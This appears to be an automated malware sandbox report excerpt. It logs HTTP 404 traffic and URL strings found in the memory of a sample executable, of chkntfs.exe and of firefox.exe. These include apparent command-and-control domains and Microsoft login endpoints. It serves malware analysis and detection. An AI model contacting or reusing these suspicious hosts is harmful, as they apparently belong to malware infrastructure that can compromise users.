            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 02:41:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 02:41:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 02:41:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 02:41:34 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 02:41:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 02:41:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 02:41:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 02:41:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 17 Dec 2024 02:42:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 17 Dec 2024 02:42:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 17 Dec 2024 02:42:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003686000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop
            Source: chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.northidahoscans.online/px.js?ch=1
            Source: chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.northidahoscans.online/px.js?ch=2
            Source: chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.northidahoscans.online/sk-logabpstatus.php?a=L2g4bEdyRU15NHN0SHVwVWZwYVdjU3FNL0laQndpc0cz
            Source: JogKDBeJAc.exe, 00000007.00000002.3306103928.00000000055A4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.timai.shop
            Source: JogKDBeJAc.exe, 00000007.00000002.3306103928.00000000055A4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.timai.shop/xsla/
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com/101dacs.js
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com/smartclick
            Source: firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Xi
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: chkntfs.exe, 00000006.00000003.2517667390.00000000075A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=waytoocool.life&utm
            Source: JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff)
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff2
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff2)
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/vendor-1.css?20241209054434
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/101domain-logo.svg
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/com.png
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/google-reviews.svg
